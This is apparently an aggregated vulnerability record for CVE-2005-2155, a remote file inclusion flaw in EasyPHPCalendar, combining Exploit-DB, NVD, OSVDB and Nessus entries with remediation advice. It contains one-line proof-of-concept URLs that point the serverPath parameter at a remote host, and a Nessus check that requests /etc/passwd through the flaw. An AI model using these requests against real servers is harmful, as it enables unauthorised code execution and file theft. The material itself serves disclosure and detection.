source: http://www.securityfocus.com/bid/14131/info
EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
These issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable.
http://www.example.com/calendar/events/datePicker.php?serverPath=http://www.example.com/[remote code]
{"id": "EDB-ID:25931", "type": "exploitdb", "bulletinFamily": "exploit", "title": "EasyPHPCalendar 6.1.5/6.2.x datePicker.php serverPath Parameter Remote File Inclusion", "description": "EasyPHPCalendar 6.1.5/6.2.x datePicker.php serverPath Parameter Remote File Inclusion. CVE-2005-2155. Webapps exploit for php platform", "published": "2005-07-04T00:00:00", "modified": "2005-07-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25931/", "reporter": "Albania Security Clan", "references": [], "cvelist": ["CVE-2005-2155"], "lastseen": "2016-02-03T02:28:42", "viewCount": 3, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-03T02:28:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2155"]}, {"type": "exploitdb", "idList": ["EDB-ID:25930", "EDB-ID:25928", "EDB-ID:25932", "EDB-ID:25929"]}, {"type": "osvdb", "idList": ["OSVDB:17734", "OSVDB:17733", "OSVDB:17731", "OSVDB:17732", "OSVDB:17723"]}, {"type": "nessus", "idList": ["EASYPHPCALENDAR_SERVERPATH_REMOTE_INCLUDES.NASL"]}], "modified": "2016-02-03T02:28:42", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/25931/", "sourceData": "source: http://www.securityfocus.com/bid/14131/info\r\n \r\nEasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.\r\n \r\nThese issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/calendar/events/datePicker.php?serverPath=http://www.example.com/[remote code]", "osvdbidlist": ["17733"]}
{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "PHP remote file inclusion vulnerability in EasyPHPCalendar 6.1.5 and earlier allows remote attackers to execute arbitrary code via the serverPath parameter.", "edition": 3, "cvss3": {}, "published": "2005-07-06T04:00:00", "title": "CVE-2005-2155", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-2155"], "modified": "2008-09-10T19:41:00", "cpe": ["cpe:/a:easyphpcalendar:easyphpcalendar:6.1.5"], "id": "CVE-2005-2155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2155", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:easyphpcalendar:easyphpcalendar:6.1.5:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2155"], "edition": 1, "description": "## Vulnerability Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /functions/popup.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 6.2.8 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Set the \"register_globals\" PHP option to \"Off\".\n## Short Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /functions/popup.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/calendar/functions/popup.php?serverPath=http://[target]/[remote code]\n## References:\nVendor URL: http://www.easyphpcalendar.com/\n[Secunia Advisory ID:15893](https://secuniaresearch.flexerasoftware.com/advisories/15893/)\n[Related OSVDB ID: 17723](https://vulners.com/osvdb/OSVDB:17723)\nFrSIRT Advisory: ADV-2005-0959\n[CVE-2005-2155](https://vulners.com/cve/CVE-2005-2155)\nBugtraq ID: 14131\n", "modified": "2005-07-05T07:06:57", "published": "2005-07-05T07:06:57", "href": "https://vulners.com/osvdb/OSVDB:17731", "id": "OSVDB:17731", "title": "EasyPHPCalendar popup.php serverPath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2155"], "edition": 1, "description": "## Vulnerability Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /setup/setupSQL.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 6.2.8 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Set the \"register_globals\" PHP option to \"Off\".\n## Short Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /setup/setupSQL.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/calendar/setup/setupSQL.php?serverPath=http://[target]/[remote code]\n## References:\nVendor URL: http://www.easyphpcalendar.com/\n[Secunia Advisory ID:15893](https://secuniaresearch.flexerasoftware.com/advisories/15893/)\n[Related OSVDB ID: 17723](https://vulners.com/osvdb/OSVDB:17723)\n[Related OSVDB ID: 17731](https://vulners.com/osvdb/OSVDB:17731)\n[Related OSVDB ID: 17732](https://vulners.com/osvdb/OSVDB:17732)\n[Related OSVDB ID: 17733](https://vulners.com/osvdb/OSVDB:17733)\nFrSIRT Advisory: ADV-2005-0959\n[CVE-2005-2155](https://vulners.com/cve/CVE-2005-2155)\nBugtraq ID: 14131\n", "modified": "2005-07-05T07:06:57", "published": "2005-07-05T07:06:57", "href": "https://vulners.com/osvdb/OSVDB:17734", "id": "OSVDB:17734", "title": "EasyPHPCalendar setupSQL.php serverPath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2155"], "edition": 1, "description": "## Vulnerability Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the header.inc.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 6.2.8 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Set the \"register_globals\" PHP option to \"Off\".\n## Short Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the header.inc.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/calendar/events/header.inc.php?serverPath=http://[target]/[remote code]\n\nhttp://[victim]/calendar/setup/header.inc.php?serverPath=http://[target]/[remote code]\n## References:\nVendor URL: http://www.easyphpcalendar.com/\n[Secunia Advisory ID:15893](https://secuniaresearch.flexerasoftware.com/advisories/15893/)\n[Related OSVDB ID: 17723](https://vulners.com/osvdb/OSVDB:17723)\n[Related OSVDB ID: 17731](https://vulners.com/osvdb/OSVDB:17731)\nFrSIRT Advisory: ADV-2005-0959\n[CVE-2005-2155](https://vulners.com/cve/CVE-2005-2155)\nBugtraq ID: 14131\n", "modified": "2005-07-05T07:06:57", "published": "2005-07-05T07:06:57", "href": "https://vulners.com/osvdb/OSVDB:17732", "id": "OSVDB:17732", "title": "EasyPHPCalendar header.inc.php serverPath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2155"], "edition": 1, "description": "## Vulnerability Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /events/datePicker.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 6.2.8 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Set the \"register_globals\" PHP option to \"Off\".\n## Short Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /events/datePicker.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/calendar/events/datePicker.php?serverPath=http://[target]/[remote code]\n## References:\nVendor URL: http://www.easyphpcalendar.com/\n[Secunia Advisory ID:15893](https://secuniaresearch.flexerasoftware.com/advisories/15893/)\n[Related OSVDB ID: 17723](https://vulners.com/osvdb/OSVDB:17723)\n[Related OSVDB ID: 17731](https://vulners.com/osvdb/OSVDB:17731)\n[Related OSVDB ID: 17732](https://vulners.com/osvdb/OSVDB:17732)\nFrSIRT Advisory: ADV-2005-0959\n[CVE-2005-2155](https://vulners.com/cve/CVE-2005-2155)\nBugtraq ID: 14131\n", "modified": "2005-07-05T07:06:57", "published": "2005-07-05T07:06:57", "href": "https://vulners.com/osvdb/OSVDB:17733", "id": "OSVDB:17733", "title": "EasyPHPCalendar datePicker.php serverPath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2155"], "edition": 1, "description": "## Vulnerability Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the calendar.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 6.2.8 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Set the \"register_globals\" PHP option to \"Off\".\n## Short Description\nEasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the calendar.php script not properly sanitizing user input supplied to the \"serverPath\" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/calendar/calendar.php?serverPath=http://[target]/[remote code]\n## References:\nVendor URL: http://www.easyphpcalendar.com/\n[Secunia Advisory ID:15893](https://secuniaresearch.flexerasoftware.com/advisories/15893/)\n[Related OSVDB ID: 17734](https://vulners.com/osvdb/OSVDB:17734)\n[Related OSVDB ID: 17731](https://vulners.com/osvdb/OSVDB:17731)\n[Related OSVDB ID: 17732](https://vulners.com/osvdb/OSVDB:17732)\n[Related OSVDB ID: 17733](https://vulners.com/osvdb/OSVDB:17733)\nFrSIRT Advisory: ADV-2005-0959\n[CVE-2005-2155](https://vulners.com/cve/CVE-2005-2155)\nBugtraq ID: 14131\n", "modified": "2005-07-05T07:06:57", "published": "2005-07-05T07:06:57", "href": "https://vulners.com/osvdb/OSVDB:17723", "id": "OSVDB:17723", "title": "EasyPHPCalendar calendar.php serverPath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T02:28:19", "description": "EasyPHPCalendar 6.1.5/6.2.x calendar.php serverPath Parameter Remote File Inclusion. CVE-2005-2155. Webapps exploit for php platform", "published": "2005-07-04T00:00:00", "type": "exploitdb", "title": "EasyPHPCalendar 6.1.5/6.2.x calendar.php serverPath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2155"], "modified": "2005-07-04T00:00:00", "id": "EDB-ID:25928", "href": "https://www.exploit-db.com/exploits/25928/", "sourceData": "source: http://www.securityfocus.com/bid/14131/info\r\n\r\nEasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.\r\n\r\nThese issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/calendar/calendar.php?serverPath=http://www.example.com/[remote code]", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25928/"}, {"lastseen": "2016-02-03T02:28:34", "description": "EasyPHPCalendar 6.1.5/6.2.x header.inc.php serverPath Parameter Remote File Inclusion. CVE-2005-2155. Webapps exploit for php platform", "published": "2005-07-04T00:00:00", "type": "exploitdb", "title": "EasyPHPCalendar 6.1.5/6.2.x header.inc.php serverPath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2155"], "modified": "2005-07-04T00:00:00", "id": "EDB-ID:25930", "href": "https://www.exploit-db.com/exploits/25930/", "sourceData": "source: http://www.securityfocus.com/bid/14131/info\r\n \r\nEasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.\r\n \r\nThese issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/calendar/events/header.inc.php?serverPath=http://www.example.com/[remote code]", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25930/"}, {"lastseen": "2016-02-03T02:28:49", "description": "EasyPHPCalendar 6.1.5/6.2.x setupSQL.php serverPath Parameter Remote File Inclusion. CVE-2005-2155. Webapps exploit for php platform", "published": "2005-07-04T00:00:00", "type": "exploitdb", "title": "EasyPHPCalendar 6.1.5/6.2.x setupSQL.php serverPath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2155"], "modified": "2005-07-04T00:00:00", "id": "EDB-ID:25932", "href": "https://www.exploit-db.com/exploits/25932/", "sourceData": "source: http://www.securityfocus.com/bid/14131/info\r\n \r\nEasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.\r\n \r\nThese issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/calendar/setup/setupSQL.php?serverPath=http://www.example.com/[remote code]", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25932/"}, {"lastseen": "2016-02-03T02:28:27", "description": "EasyPHPCalendar 6.1.5/6.2.x popup.php serverPath Parameter Remote File Inclusion. CVE-2005-2155. Webapps exploit for php platform", "published": "2005-07-04T00:00:00", "type": "exploitdb", "title": "EasyPHPCalendar 6.1.5/6.2.x popup.php serverPath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2155"], "modified": "2005-07-04T00:00:00", "id": "EDB-ID:25929", "href": "https://www.exploit-db.com/exploits/25929/", "sourceData": "source: http://www.securityfocus.com/bid/14131/info\r\n \r\nEasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.\r\n \r\nThese issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/calendar/functions/popup.php?serverPath=http://www.example.com/[remote code]", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25929/"}], "nessus": [{"lastseen": "2021-01-01T01:57:30", "description": "The remote host is running EasyPHPCalendar, a web-based calendar\nsystem written in PHP. \n\nThe installed version of EasyPHPCalendar allows remote attackers to\ncontrol the 'serverPath' variable used when including PHP code in\nseveral of the application's scripts. Provided PHP's\n'register_globals' setting is enabled, an attacker is able to view\narbitrary files on the remote host and even execute arbitrary PHP\ncode, possibly taken from third-party hosts.", "edition": 24, "published": "2005-07-05T00:00:00", "title": "EasyPHPCalendar Multiple Script serverPath Parameter Remote File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2155"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "EASYPHPCALENDAR_SERVERPATH_REMOTE_INCLUDES.NASL", "href": "https://www.tenable.com/plugins/nessus/18617", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18617);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2005-2155\");\n script_bugtraq_id(14131);\n\n script_name(english:\"EasyPHPCalendar Multiple Script serverPath Parameter Remote File Inclusion\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is susceptible\nto remote file inclusion attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running EasyPHPCalendar, a web-based calendar\nsystem written in PHP. \n\nThe installed version of EasyPHPCalendar allows remote attackers to\ncontrol the 'serverPath' variable used when including PHP code in\nseveral of the application's scripts. Provided PHP's\n'register_globals' setting is enabled, an attacker is able to view\narbitrary files on the remote host and even execute arbitrary PHP\ncode, possibly taken from third-party hosts.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/advisories/15893\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to EasyPHPCalendar version 6.2.8 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/07/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/07/05\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for serverPath remote file include vulnerabilities in EasyPHPCalendar\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Loop through CGI directories.\nforeach dir (cgi_dirs()) {\n # Try to exploit one of the flaws to read /etc/passwd.\n r = http_send_recv3(method:\"GET\",\n item:string(\n dir, \"/calendar.php?\",\n \"serverPath=/etc/passwd%00\" ), \n port:port );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if there's an entry for root.\n if (egrep(string:res, pattern:\"root:.*:0:[01]:\")) {\n security_warning(port);\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
